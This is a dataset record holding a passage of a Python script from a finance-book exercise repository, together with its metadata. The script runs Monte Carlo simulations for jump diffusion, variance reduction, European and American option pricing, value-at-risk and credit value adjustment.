plt.savefig(PATH + 'stoch_vol2.png', dpi=300)\n plt.close()\n print_statistics(S[-1], v[-1])\n \ndef jump_diffusion():\n S0 = 100.\n r = 0.05\n sigma = 0.2\n lamb = 0.75\n mu = -0.6\n delta = 0.25\n T = 1.0\n M = 50\n I = 10000\n dt = T / M\n rj = lamb * (np.exp(mu + 0.5 * delta ** 2) - 1)\n S = np.zeros((M + 1, I))\n S[0] = S0\n sn1 = npr.standard_normal((M + 1, I))\n sn2 = npr.standard_normal((M + 1, I))\n poi = npr.poisson(lamb * dt, (M + 1, I))\n for t in range(1, M + 1, 1):\n S[t] = S[t - 1] * (np.exp((r - rj - 0.5 * sigma ** 2) * dt\n + sigma * np.sqrt(dt) * sn1[t])\n + (np.exp(mu + delta * sn2[t]) - 1)\n * poi[t])\n S[t] = np.maximum(S[t], 0)\n \n plt.hist(S[-1], bins=50)\n plt.xlabel('value')\n plt.ylabel('frequency')\n plt.grid(True)\n plt.savefig(PATH + 'jump_diff1.png', dpi=300)\n plt.close()\n\n plt.plot(S[:, :10], lw=1.5)\n plt.xlabel('time')\n plt.ylabel('index level')\n plt.grid(True)\n plt.savefig(PATH + 'jump_diff2.png', dpi=300)\n plt.close()\n\ndef var_reduction():\n print(\"%15s %15s\" % ('Mean', 'Std. Deviation'))\n print(31 * \"-\")\n for i in range(1, 31, 2):\n npr.seed(1000)\n sn = npr.standard_normal(i ** 2 * 10000)\n print(\"%15.12f %15.12f\" % (sn.mean(), sn.std()))\n\n print(i ** 2 * 10000)\n sn = npr.standard_normal(int(10000 / 2))\n sn = np.concatenate((sn, -sn))\n print(np.shape(sn))\n print(\"%15s %15s\" % ('Mean', 'Std. Deviation'))\n print(31 * \"-\")\n for i in range(1, 31, 2):\n npr.seed(1000)\n sn = npr.standard_normal(i ** 2 * int(10000 / 2))\n sn = np.concatenate((sn, -sn))\n print(\"%15.12f %15.12f\" % (sn.mean(), sn.std()))\n sn = npr.standard_normal(10000)\n print(sn.mean())\n print(sn.std())\n sn_new = (sn - sn.mean()) / sn.std()\n print(sn_new.mean())\n print(sn_new.std())\n print(gen_sn(50, 10000))\n print(gen_sn(50, 10000, anti_paths=False))\n print(gen_sn(50, 10000, anti_paths=False, mo_match=False))\n print(gen_sn(50, 10000, mo_match=False))\n\ndef gen_sn(M, I, anti_paths=True, mo_match=True):\n ''' Function to generate random numbers for simulation.\n \n Parameters\n ==========\n M : int\n number of time intervals for discretization\n I : int\n number of paths to be simulated\n anti_paths: boolean\n use of antithetic variates\n mo_math : boolean\n use of moment matching\n '''\n if anti_paths is True:\n sn = npr.standard_normal((M + 1, int(I / 2)))\n sn = np.concatenate((sn, -sn), axis=1)\n else:\n sn = npr.standard_normal((M + 1, I))\n if mo_match is True:\n sn = (sn - sn.mean()) / sn.std()\n return sn\n \ndef valuation():\n from bsm_functions import bsm_call_value\n S0 = 100.\n r = 0.05\n sigma = 0.25\n T = 1.0\n I = 5000\n M = 50\n print(gbm_mcs_stat(K=105.))\n print(gbm_mcs_dyna(K=110., option='call'))\n print(gbm_mcs_dyna(K=110., option='put'))\n \n stat_res = []\n dyna_res = []\n anal_res = []\n k_list = np.arange(80., 120.1, 5.)\n np.random.seed(200000)\n for K in k_list:\n stat_res.append(gbm_mcs_stat(K))\n dyna_res.append(gbm_mcs_dyna(K))\n anal_res.append(bsm_call_value(S0, K, T, r, sigma))\n stat_res = np.array(stat_res)\n dyna_res = np.array(dyna_res)\n anal_res = np.array(anal_res)\n \n fig, (ax1, ax2) = plt.subplots(2, 1, sharex=True, figsize=(8, 6))\n ax1.plot(k_list, anal_res, 'b', label='analytical')\n ax1.plot(k_list, stat_res, 'ro', label='static')\n ax1.set_ylabel('European call option value')\n ax1.grid(True)\n ax1.legend(loc=0)\n ax1.set_ylim(ymin=0)\n wi = 1.0\n ax2.bar(k_list - wi / 2, (anal_res - stat_res) / anal_res * 100, wi)\n ax2.set_xlabel('strike')\n ax2.set_ylabel('difference in %')\n ax2.set_xlim(left=75, right=125)\n ax2.grid(True)\n plt.savefig(PATH + 'valuation1.png', dpi=300)\n plt.close()\n \n fig, (ax1, ax2) = plt.subplots(2, 1, sharex=True, figsize=(8, 6))\n ax1.plot(k_list, anal_res, 'b', label='analytical')\n ax1.plot(k_list, dyna_res, 'ro', label='dynamic')\n ax1.set_ylabel('European call option value')\n ax1.grid(True)\n ax1.legend(loc=0)\n ax1.set_ylim(ymin=0)\n\n wi = 1.0\n ax2.bar(k_list - wi / 2, (anal_res - dyna_res) / anal_res * 100, wi)\n ax2.set_xlabel('strike')\n ax2.set_ylabel('difference in %')\n ax2.set_xlim(left=75, right=125)\n ax2.grid(True)\n plt.savefig(PATH + 'valuation2.png', dpi=300)\n plt.close()\n \n print(gbm_mcs_amer(110., option='call'))\n print(gbm_mcs_amer(110., option='put'))\n euro_res = []\n amer_res = []\n k_list = np.arange(80., 120.1, 5.)\n for K in k_list:\n euro_res.append(gbm_mcs_dyna(K, 'put'))\n amer_res.append(gbm_mcs_amer(K, 'put'))\n euro_res = np.array(euro_res)\n amer_res = np.array(amer_res)\n\n fig, (ax1, ax2) = plt.subplots(2, 1, sharex=True, figsize=(8, 6))\n ax1.plot(k_list, euro_res, 'b', label='European put')\n ax1.plot(k_list, amer_res, 'ro', label='American put')\n ax1.set_ylabel('call option value')\n ax1.grid(True)\n ax1.legend(loc=0)\n \n wi = 1.0\n ax2.bar(k_list - wi / 2, (amer_res - euro_res) / euro_res * 100, wi)\n ax2.set_xlabel('strike')\n ax2.set_ylabel('early exercise premium in %')\n ax2.set_xlim(left=75, right=125)\n ax2.grid(True)\n plt.savefig(PATH + 'valuation3.png', dpi=300)\n plt.close()\n\ndef gbm_mcs_stat(K):\n ''' Valuation of European call option in Black-Scholes-Merton\n by Monte Carlo simulation (of index level at maturity)\n \n Parameters\n ==========\n K : float\n (positive) strike price of the option\n \n Returns\n =======\n C0 : float\n estimated present value of European call option\n '''\n S0 = 100.\n r = 0.05\n sigma = 0.25\n T = 1.0\n I = 50000\n sn = gen_sn(1, I)\n # simulate index level at maturity\n ST = S0 * np.exp((r - 0.5 * sigma ** 2) * T \n + sigma * np.sqrt(T) * sn[1])\n # calculate payoff at maturity\n hT = np.maximum(ST - K, 0)\n # calculate MCS estimator\n C0 = np.exp(-r * T) * 1 / I * np.sum(hT)\n return C0\n\ndef gbm_mcs_dyna(K, option='call'):\n ''' Valuation of European options in Black-Scholes-Merton\n by Monte Carlo simulation (of index level paths)\n \n Parameters\n ==========\n K : float\n (positive) strike price of the option\n option : string\n type of the option to be valued ('call', 'put')\n \n Returns\n =======\n C0 : float\n estimated present value of European call option\n '''\n S0 = 100.\n r = 0.05\n sigma = 0.25\n T = 1.0\n I = 50000\n M = 50\n dt = T / M\n # simulation of index level paths\n S = np.zeros((M + 1, I))\n S[0] = S0\n sn = gen_sn(M, I)\n for t in range(1, M + 1):\n S[t] = S[t - 1] * np.exp((r - 0.5 * sigma ** 2) * dt \n + sigma * np.sqrt(dt) * sn[t])\n # case-based calculation of payoff\n if option == 'call':\n hT = np.maximum(S[-1] - K, 0)\n else:\n hT = np.maximum(K - S[-1], 0)\n # calculation of MCS estimator\n C0 = np.exp(-r * T) * 1 / I * np.sum(hT)\n return C0\n\ndef gbm_mcs_amer(K, option='call'):\n ''' Valuation of American option in Black-Scholes-Merton\n by Monte Carlo simulation by LSM algorithm\n \n Parameters\n ==========\n K : float\n (positive) strike price of the option\n option : string\n type of the option to be valued ('call', 'put')\n \n Returns\n =======\n C0 : float\n estimated present value of European call option\n '''\n S0 = 100.\n r = 0.05\n sigma = 0.25\n T = 1.0\n I = 50000\n M = 50\n dt = T / M\n df = np.exp(-r * dt)\n # simulation of index levels\n S = np.zeros((M + 1, I))\n S[0] = S0\n sn = gen_sn(M, I)\n for t in range(1, M + 1):\n S[t] = S[t - 1] * np.exp((r - 0.5 * sigma ** 2) * dt \n + sigma * np.sqrt(dt) * sn[t])\n # case based calculation of payoff\n if option == 'call':\n h = np.maximum(S - K, 0)\n else:\n h = np.maximum(K - S, 0)\n # LSM algorithm\n V = np.copy(h)\n for t in range(M - 1, 0, -1):\n reg = np.polyfit(S[t], V[t + 1] * df, 7)\n C = np.polyval(reg, S[t])\n V[t] = np.where(C > h[t], V[t + 1] * df, h[t])\n # MCS estimator\n C0 = df * 1 / I * np.sum(V[1])\n return C0\n\ndef VaR():\n S0 = 100\n r = 0.05\n sigma = 0.25\n T = 30 / 365.\n I = 10000\n mu = -0.6\n delta = 0.25\n lamb = 0.75\n M = 50\n ST = S0 * np.exp((r - 0.5 * sigma ** 2) * T \n + sigma * np.sqrt(T) * npr.standard_normal(I))\n R_gbm = np.sort(ST - S0)\n \n plt.hist(R_gbm, bins=50)\n plt.xlabel('absolute return')\n plt.ylabel('frequency')\n plt.grid(True)\n plt.savefig(PATH + 'VaR0.png', dpi=300)\n plt.close()\n\n percs = [0.01, 0.1, 1., 2.5, 5.0, 10.0]\n var = scs.scoreatpercentile(R_gbm, percs)\n print(\"%16s %16s\" % ('Confidence Level', 'Value-at-Risk'))\n print(33 * \"-\")\n for pair in zip(percs, var):\n print(\"%16.2f %16.3f\" % (100 - pair[0], -pair[1]))\n\n dt = 30. / 365 / M\n rj = lamb * (np.exp(mu + 0.5 * delta ** 2) - 1)\n S = np.zeros((M + 1, I))\n S[0] = S0\n sn1 = npr.standard_normal((M + 1, I))\n sn2 = npr.standard_normal((M + 1, I))\n poi = npr.poisson(lamb * dt, (M + 1, I))\n for t in range(1, M + 1, 1):\n S[t] = S[t - 1] * (np.exp((r - rj - 0.5 * sigma ** 2) * dt\n + sigma * np.sqrt(dt) * sn1[t])\n + (np.exp(mu + delta * sn2[t]) - 1)\n * poi[t])\n S[t] = np.maximum(S[t], 0)\n R_jd = np.sort(S[-1] - S0)\n \n plt.hist(R_jd, bins=50)\n plt.xlabel('absolute return')\n plt.ylabel('frequency')\n plt.grid(True)\n plt.savefig(PATH + 'VaR1.png', dpi=300)\n plt.close()\n \n percs = [0.01, 0.1, 1., 2.5, 5.0, 10.0]\n var = scs.scoreatpercentile(R_jd, percs)\n print(\"%16s %16s\" % ('Confidence Level', 'Value-at-Risk'))\n print(33 * \"-\")\n for pair in zip(percs, var):\n print(\"%16.2f %16.3f\" % (100 - pair[0], -pair[1]))\n\n percs = list(np.arange(0.0, 10.1, 0.1))\n gbm_var = scs.scoreatpercentile(R_gbm, percs)\n jd_var = scs.scoreatpercentile(R_jd, percs)\n\n plt.plot(percs, gbm_var, 'b', lw=1.5, label='GBM')\n plt.plot(percs, jd_var, 'r', lw=1.5, label='JD')\n plt.legend(loc=4)\n plt.xlabel('100 - confidence level [%]')\n plt.ylabel('value-at-risk')\n plt.grid(True)\n plt.ylim(ymax=0.0)\n plt.savefig(PATH + 'VaR2.png', dpi=300)\n plt.close()\n\ndef credit_adjustments():\n S0 = 100.\n r = 0.05\n sigma = 0.2\n T = 1.\n I = 100000\n ST = S0 * np.exp((r - 0.5 * sigma ** 2) * T \n + sigma * np.sqrt(T) * npr.standard_normal(I))\n L = 0.5\n p = 0.01\n D = npr.poisson(p * T, I)\n D = np.where(D > 1, 1, D)\n print(np.exp(-r * T) * 1 / I * np.sum(ST))\n CVaR = np.exp(-r * T) * 1 / I * np.sum(L * D * ST)\n print(CVaR)\n S0_CVA = np.exp(-r * T) * 1 / I * np.sum((1 - L * D) * ST)\n print(S0_CVA)\n S0_adj = S0 - CVaR\n print(S0_adj)\n print(np.count_nonzero(L * D * ST))\n\n plt.hist(L * D * ST, bins=50)\n plt.xlabel('loss')\n plt.ylabel('frequency')\n plt.grid(True)\n plt.ylim(ymax=175)\n plt.savefig(PATH + 'CVaR1.png', dpi=300)\n plt.close()\n\n K = 100.\n hT = np.maximum(ST - K, 0)\n C0 = np.exp(-r * T) * 1 / I * np.sum(hT)\n print(C0)\n CVaR = np.exp(-r * T) * 1 / I * np.sum(L * D * hT)\n print(CVaR)\n C0_CVA = np.exp(-r * T) * 1 / I * np.sum((1 - L * D) * hT)\n print(C0_CVA)\n print(np.count_nonzero(L * D * hT)) # number of losses\n print(np.count_nonzero(D)) # number of defaults\n print(I - np.count_nonzero(hT)) # zero payoff\n \n plt.hist(L * D * hT, bins=50)\n plt.xlabel('loss')\n plt.ylabel('frequency')\n plt.grid(True)\n plt.ylim(ymax=350)\n plt.savefig(PATH + 'CVaR2.png', dpi=300)\n plt.close()\n\nif __name__ == '__main__':\n # randon_nums()\n # rand_vals()\n # stochastic_procs()\n # sqr_rt_diffusion()\n # stoch_vol()\n # jump_diffusion()\n # var_reduction()\n # valuation()\n # VaR()\n credit_adjustments()", "repo_name": "mccarvik/python_for_finance", "sub_path": "books/python_for_finance_book/ch_scraps/10ch_scrap.py", "file_name": "10ch_scrap.py", "file_ext": "py", "file_size_in_byte": 20606, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 3, "dataset": "github-code", "pt": "53", "api": [{"api_name": "sys.path.append", "line_number": 2, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 2, "usage_type": "attribute"}, {"api_name": "sys.path.append", "line_number": 3, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 3, "usage_type": "attribute"}, {"api_name": "sys.path.append", "line_number": 4, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 4, "usage_type": "attribute"}, {"api_name": "sys.path.append", "line_number": 5, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 5, "usage_type": "attribute"}, {"api_name": "matplotlib.use", "line_number": 7, "usage_type": "call"}, {"api_name": "numpy.random.rand", "line_number": 17, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 17, "usage_type": "name"}, {"api_name": "numpy.random.rand", "line_number": 18, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 18, "usage_type": "name"}, {"api_name": "numpy.random.rand", "line_number": 21, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 21, "usage_type": "name"}, {"api_name": "numpy.random.rand", "line_number": 22, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 22, "usage_type": "name"}, {"api_name": "numpy.random.rand", "line_number": 24, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 24, "usage_type": "name"}, {"api_name": "numpy.random.randint", "line_number": 25, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 25, "usage_type": "name"}, {"api_name": "numpy.random.sample", "line_number": 26, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 26, "usage_type": "name"}, {"api_name": "numpy.random.choice", "line_number": 28, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 28, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 29, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 29, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 45, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 45, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.close", "line_number": 46, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 46, "usage_type": "name"}, {"api_name": "numpy.random.standard_normal", "line_number": 49, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 49, "usage_type": "name"}, {"api_name": "numpy.random.normal", "line_number": 50, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 50, "usage_type": "name"}, {"api_name": "numpy.random.chisquare", "line_number": 51, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 51, "usage_type": "name"}, {"api_name": "numpy.random.poisson", "line_number": 52, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 52, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 53, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 53, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 68, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 68, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.close", "line_number": 69, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 69, "usage_type": "name"}, {"api_name": "numpy.exp", "line_number": 77, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 78, "usage_type": "call"}, {"api_name": "numpy.random.standard_normal", "line_number": 78, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 78, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.hist", "line_number": 79, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 79, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 80, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 80, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 81, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 81, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.grid", "line_number": 82, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 82, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 83, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 83, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.close", "line_number": 84, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 84, "usage_type": "name"}, {"api_name": "numpy.random.lognormal", "line_number": 86, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 86, "usage_type": "name"}, {"api_name": "numpy.sqrt", "line_number": 87, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.hist", "line_number": 88, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 88, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 89, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 89, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 90, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 90, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.grid", "line_number": 91, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 91, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 92, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 92, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.close", "line_number": 93, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 93, "usage_type": "name"}, {"api_name": "scipy.stats.describe", "line_number": 104, "usage_type": "call"}, {"api_name": "scipy.stats", "line_number": 104, "usage_type": "name"}, {"api_name": "scipy.stats.describe", "line_number": 105, "usage_type": "call"}, {"api_name": "scipy.stats", "line_number": 105, "usage_type": "name"}, {"api_name": "numpy.sqrt", "line_number": 113, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 125, "usage_type": "call"}, {"api_name": "numpy.exp", "line_number": 127, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 128, "usage_type": "call"}, {"api_name": "numpy.random.standard_normal", "line_number": 128, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 128, "usage_type": "name"}, {"api_name": "numpy.random.lognormal", "line_number": 129, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 129, "usage_type": "name"}, {"api_name": "numpy.sqrt", "line_number": 130, "usage_type": "call"}, {"api_name": "numpy.exp", "line_number": 134, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 135, "usage_type": "call"}, {"api_name": "numpy.random.standard_normal", "line_number": 135, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 135, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.hist", "line_number": 136, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 136, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 137, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 137, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 138, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 138, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.grid", "line_number": 139, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 139, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 140, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 140, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.close", "line_number": 141, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 141, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 145, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 145, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 146, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 146, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 147, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 147, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.grid", "line_number": 148, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 148, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 149, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 149, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.close", "line_number": 150, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 150, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.hist", "line_number": 162, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 162, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 163, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 163, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 164, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 164, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.grid", "line_number": 165, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 165, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 166, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 166, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.close", "line_number": 167, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 167, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 169, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 169, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 170, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 170, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 171, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 171, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.grid", "line_number": 172, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 172, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 173, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 173, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.close", "line_number": 174, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 174, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.hist", "line_number": 177, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 177, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 178, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 178, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 179, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 179, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.grid", "line_number": 180, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 180, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 181, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 181, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.close", "line_number": 182, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 182, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 184, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 184, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 185, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 185, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 186, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 186, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.grid", "line_number": 187, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 187, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 188, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 188, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.close", "line_number": 189, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 189, "usage_type": "name"}, {"api_name": "utils.timeme", "line_number": 193, "usage_type": "call"}, {"api_name": "utils.timeme", "line_number": 194, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 206, "usage_type": "call"}, {"api_name": "numpy.zeros_like", "line_number": 207, "usage_type": "call"}, {"api_name": "numpy.maximum", "line_number": 212, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 213, "usage_type": "call"}, {"api_name": "numpy.maximum", "line_number": 213, "usage_type": "call"}, {"api_name": "numpy.random.standard_normal", "line_number": 214, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 214, "usage_type": "name"}, {"api_name": "numpy.maximum", "line_number": 215, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 227, "usage_type": "call"}, {"api_name": "numpy.exp", "line_number": 231, "usage_type": "call"}, {"api_name": "numpy.exp", "line_number": 232, "usage_type": "call"}, {"api_name": "numpy.random.noncentral_chisquare", "line_number": 233, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 233, "usage_type": "name"}, {"api_name": "numpy.zeros", "line_number": 245, "usage_type": "call"}, {"api_name": "numpy.linalg.cholesky", "line_number": 248, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 248, "usage_type": "attribute"}, {"api_name": "numpy.random.standard_normal", "line_number": 252, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 252, "usage_type": "name"}, {"api_name": "numpy.zeros_like", "line_number": 254, "usage_type": "call"}, {"api_name": "numpy.zeros_like", "line_number": 255, "usage_type": "call"}, {"api_name": "numpy.dot", "line_number": 259, "usage_type": "call"}, {"api_name": "numpy.maximum", "line_number": 260, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 261, "usage_type": "call"}, {"api_name": "numpy.maximum", "line_number": 261, "usage_type": "call"}, {"api_name": "numpy.maximum", "line_number": 263, "usage_type": "call"}, {"api_name": "numpy.zeros_like", "line_number": 264, "usage_type": "call"}, {"api_name": "numpy.dot", "line_number": 267, "usage_type": "call"}, {"api_name": "numpy.exp", "line_number": 268, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 269, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 271, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 271, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 279, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 279, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.close", "line_number": 280, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 280, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 282, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 282, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 290, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 290, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.close", "line_number": 291, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 291, "usage_type": "name"}, {"api_name": "numpy.exp", "line_number": 305, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 306, "usage_type": "call"}, {"api_name": "numpy.random.standard_normal", "line_number": 308, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 308, "usage_type": "name"}, {"api_name": "numpy.random.standard_normal", "line_number": 309, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 309, "usage_type": "name"}, {"api_name": "numpy.random.poisson", "line_number": 310, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 310, "usage_type": "name"}, {"api_name": "numpy.exp", "line_number": 312, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 313, "usage_type": "call"}, {"api_name": "numpy.exp", "line_number": 314, "usage_type": "call"}, {"api_name": "numpy.maximum", "line_number": 316, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.hist", "line_number": 318, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 318, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 319, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 319, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 320, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 320, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.grid", "line_number": 321, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 321, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 322, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 322, "usage_type": "name"}, {"api_name": 